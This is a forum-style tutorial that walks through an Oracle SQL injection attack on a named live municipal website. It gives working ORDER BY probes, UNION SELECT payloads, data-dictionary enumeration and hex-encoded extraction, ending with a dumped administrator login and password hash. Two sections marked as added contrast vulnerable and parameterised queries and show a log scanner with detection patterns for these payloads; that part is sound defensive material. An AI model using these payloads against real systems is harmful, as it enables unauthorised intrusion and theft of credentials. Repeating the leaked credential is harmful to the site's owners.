Hello guys, this is a tutorial about Oracle-based SQL injection.
Here is the site to learn with
PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122
Let's try order by
PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122 order by 1
Look under the picture, it stays like this:
Sei in : Home -> Citta' -> Congressi
At order by 7, boom, it changes:
PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122%20order%20by%207
Sei in : Home -> Citta' ->
So the number of columns is 6.
Time to use union select
PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122 union select null,null,null,null,null,null
LOLS... the vulnerable column isn't shown.
Let's try all columns
PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122 union select banner,null,null,null,null,null from v$version
Nothing shown, so this is the wrong column.
PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=122 union select null,banner,null,null,null,null from v$version
The word Congressi is shown again, so this is the right column.
Change id_categoria to null:
PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=null%20union%20select%20null,banner,null,null,null,null%20from%20v$version
version: CORE 9.2.0.6.0 Production
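Why the ORDER BY and UNION steps above get through, and the fix, as an added example that is not part of the original tutorial: the parameter lands in a numeric position of the SQL text, so no quote is needed to inject. It uses Python's sqlite3 as a stand-in for Oracle; the `categoria` and `utente` tables and both function names are constructed for illustration.

```python
import sqlite3

def make_db():
    """Constructed stand-in schema (sqlite3 here, not Oracle)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE categoria (id INTEGER, nome TEXT, c3, c4, c5, c6);
        INSERT INTO categoria VALUES (122, 'Congressi', 0, 0, 0, 0);
        CREATE TABLE utente (login TEXT, password TEXT);
        INSERT INTO utente VALUES ('demo', 'constructed-hash');
    """)
    return db

def breadcrumb_weak(db, id_categoria):
    # Weak: the raw parameter becomes part of the SQL text. The value sits
    # in a numeric context, so there is no quote to escape and quote
    # filtering would not have stopped the ORDER BY / UNION requests.
    sql = "SELECT * FROM categoria WHERE id = " + id_categoria
    return [row[1] for row in db.execute(sql)]

def breadcrumb_fixed(db, id_categoria):
    # Fix 1: allow-list the type, only ASCII decimal digits pass.
    if not (id_categoria.isascii() and id_categoria.isdigit()):
        raise ValueError("id_categoria must be a positive integer")
    # Fix 2: send the value as a bind variable, separate from the SQL text.
    sql = "SELECT * FROM categoria WHERE id = ?"
    return [row[1] for row in db.execute(sql, (int(id_categoria),))]

if __name__ == "__main__":
    db = make_db()
    # Same request shape as the walkthrough, pointed at the constructed table.
    probe = "null union select null,login,null,null,null,null from utente"
    print("weak :", breadcrumb_weak(db, probe))
    try:
        breadcrumb_fixed(db, probe)
    except ValueError as exc:
        print("fixed:", exc)
    print("fixed:", breadcrumb_fixed(db, "122"))
```

In a PHP application on Oracle the same two fixes are an integer check on the parameter and a bind variable set with `oci_bind_by_name`.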
CURRENT USER
Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,user,NULL,NULL,NULL,NULL from dual--
output=WWWTARANTO
CURRENT DATABASE
Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,SYS.DATABASE_NAME,NULL,NULL,NULL,NULL from DUAL--
output=CSTTA
Another method:
Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,global_name,NULL,NULL,NULL,NULL from global_name-- -
Time to get tables
PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=null union select null,table_name,null,null,null,null from (select ROWNUM r,table_name from all_tables order by table_name) where r=130
This will get table number 130. Change r to get another table number.
Time to get this table's columns
PHP Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=null%20union%20select%20null,column_name,null,null,null,null%20from%20%28select%20ROWNUM%20r,column_name%20from%20all_tab_columns%20where%20table_name=%27RESULT$%27%29%20where%20r=3
Change r here too.
Retrieving user-created tables and columns from user_tab_columns. concat() works but takes only 2 parameters, so the || operator is used to join table name, separator and column name.
Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,rawtohex(table_name||chr(58)||column_name),NULL,NULL,NULL,NULL from USER_TAB_COLUMNS--
54425F414C424F3A444154415F45534543555A494F4E45
Convert this hex value to a string:
TB_ALBO:DATA_ESECUZIONE
To find the next column of table TB_ALBO
Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,rawtohex(table_name||chr(58)||column_name),NULL,NULL,NULL,NULL from USER_TAB_COLUMNS where column_name> CHR(68) || CHR(65) || CHR(84) || CHR(65) || CHR(95) || CHR(69) || CHR(83) || CHR(69) || CHR(67) || CHR(85) || CHR(90) || CHR(73) || CHR(79) || CHR(78) || CHR(69)--
Code:
CHR(68) || CHR(65) || CHR(84) || CHR(65) || CHR(95) || CHR(69) || CHR(83) || CHR(69) || CHR(67) || CHR(85) || CHR(90) || CHR(73) || CHR(79) || CHR(78) || CHR(69) = DATA_ESECUZIONE
54425F414C424F3A444154415F505542424C4943415A494F4E45
TB_ALBO:DATA_PUBBLICAZIONE
Using > with the last name retrieved, all columns can be retrieved one after another. If an error is generated or the query jumps to some other table, move on to the next table.
MOVING TO NEXT TABLE
Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,rawtohex(table_name||chr(58)||column_name),NULL,NULL,NULL,NULL from USER_TAB_COLUMNS where table_name> CHR(84) || CHR(66) || CHR(95) || CHR(65) || CHR(76) || CHR(66) || CHR(79)--
54425F414C424F5F444F43554D454E544F3A4445534352495A494F4E45
TB_ALBO_DOCUMENTO:DESCRIZIONE
MOVING TO NEXT COLUMN OF TABLE TB_ALBO_DOCUMENTO
Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,rawtohex(table_name||chr(58)||column_name),NULL,NULL,NULL,NULL from USER_TAB_COLUMNS where table_name> CHR(84) || CHR(66) || CHR(95) || CHR(65) || CHR(76) || CHR(66) || CHR(79) and column_name> CHR(68) || CHR(69) || CHR(83) || CHR(67) || CHR(82) || CHR(73) || CHR(90) || CHR(73) || CHR(79) || CHR(78) || CHR(69)--
54425F414C424F5F444F43554D454E544F3A4944
TB_ALBO_DOCUMENTO:ID
EXTRACTING DATA
Code:
http://www.comune.taranto.it/citta/dettaglio_news.php?id_news=491&id_categoria=-122 union select NULL,rawtohex(LOGIN||chr(58)||PASSWORD),NULL,NULL,NULL,NULL from TB_UTENTE--
61646D696E6973747261746F723A3966323165646463363865663338373837666235656639313939316265613264
administrator:9f21eddc68ef38787fb5ef91991bea2d
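Every request in this walkthrough carries its SQL in the GET query string, so the whole sequence is visible in the web server's access log. The following is an added example, not part of the original tutorial: a Python scanner that URL-decodes each request and flags the Oracle-specific markers used above. The log lines, rule names and client addresses are constructed.

```python
import re
from urllib.parse import unquote_plus

# Markers taken from the requests shown in this walkthrough.
RULES = {
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "oracle_dictionary": re.compile(
        r"\b(?:v\$version|all_tables|all_tab_columns|user_tab_columns"
        r"|global_name)\b", re.I),
    "rawtohex_output": re.compile(r"\brawtohex\s*\(", re.I),
    "chr_chain": re.compile(r"(?:chr\(\d+\)\s*\|\|\s*){2,}", re.I),
}
REQUEST = re.compile(r'^(\S+) .*?"[A-Z]+ (.+?) HTTP/[\d.]+"')

def normalise(query):
    # Decode twice to catch double URL-encoding, then replace /**/ comments
    # (a common stand-in for spaces) so the rules see plain whitespace.
    for _ in range(2):
        query = unquote_plus(query)
    return re.sub(r"/\*.*?\*/", " ", query)

def scan(lines):
    """Return (client, [rule names]) for each request that trips a rule."""
    hits = []
    for line in lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        query = normalise(target.partition("?")[2])
        fired = sorted(name for name, rx in RULES.items() if rx.search(query))
        if fired:
            hits.append((client, fired))
    return hits

# Constructed access-log lines (documentation IP ranges), not real traffic.
REQ_PREFIX = '- - [01/Jan/2024:10:00:00 +0000] "GET /citta/dettaglio_news.php?id_news=491&id_categoria='
SAMPLE_LOG = [
    f'198.51.100.7 {REQ_PREFIX}122 HTTP/1.1" 200 5120',
    f'203.0.113.9 {REQ_PREFIX}122%20order%20by%207 HTTP/1.1" 200 4980',
    f'203.0.113.9 {REQ_PREFIX}null%20union%20select%20null,banner,null,null,null,null%20from%20v$version HTTP/1.1" 200 5001',
    f'203.0.113.9 {REQ_PREFIX}-122%20union%20select%20NULL,rawtohex(table_name||chr(58)||column_name),NULL,NULL,NULL,NULL%20from%20USER_TAB_COLUMNS%20where%20column_name%3E%20CHR(68)%20||%20CHR(65)%20||%20CHR(84)-- HTTP/1.1" 200 5003',
]

if __name__ == "__main__":
    for client, fired in scan(SAMPLE_LOG):
        print(client, ", ".join(fired))
```

A single client that trips `order_by_probe` with increasing numbers and then `union_select` within a short window is a stronger signal than any one rule alone.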